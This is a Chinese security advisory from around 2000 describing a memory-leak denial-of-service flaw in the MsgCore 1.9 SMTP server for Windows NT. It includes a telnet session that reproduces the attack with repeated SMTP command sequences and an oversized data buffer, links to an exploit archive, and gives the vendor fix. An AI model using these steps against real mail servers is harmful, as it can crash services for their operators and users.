首页 -> 安全研究

安全研究

安全漏洞
MsgCore/NT 拒绝服务漏洞

发布日期:2000-01-13
更新日期:2000-01-15

受影响系统:
Nosque Workshop MsgCore 1.9
不受影响系统:
Nosque Workshop MsgCore 2.10
描述:

    Nosque Workshop MsgCore SMTP中存在拒绝服务漏洞。问题在于存储服务器输入的内存没有进行释放而最终造成资源耗尽,使NT目标主机需要重新启动。如果一个smtp客户端(或用户手工进行输入)在连接中发送多个"HELO/ MAIL FROM/ RCPT TO / DATA" 序列,分配于用来存储这些值的内存不能释放,一旦内存耗尽,目标主机就会停止运行。

例子:

[hellme@die-communitech.net$ telnet example.com 25
Trying example.com...
Connected to example.com.
Escape character is '^]'.
220 MachineNamet AttackerIp with SMTP for NT BD0198
HELO CHEEF
250 Hello, AtackerHostName AttackerIp
mail to:<sssa.com>
250 <sssa.com@localhost> ok
rcpt to:<sssc.com>
250 to:<sssc.com> ok
Data
354 Send Mail Message Body; End with <CR><LF>.<CR><LF>
[buffer]
(point)
250 OK

    如果反复执行这些命令,保存到服务器内存中的所有信息就有可能导致内存出错。
    其中 [buffer] 为大约10000个字符。

相关资料:
    开发商:http://www.web-net.com/supermail/
    软件包:http://shareit1.element5.com/programs.html?nr=100364




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


    http://www.securityfocus.com/data/vulnerabilities/exploits/diesmtp.zip



建议:

    MsgCore在2.X版已经修复了这个漏洞:

    http://www.web-net.com/supermail/



浏览次数:6651
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障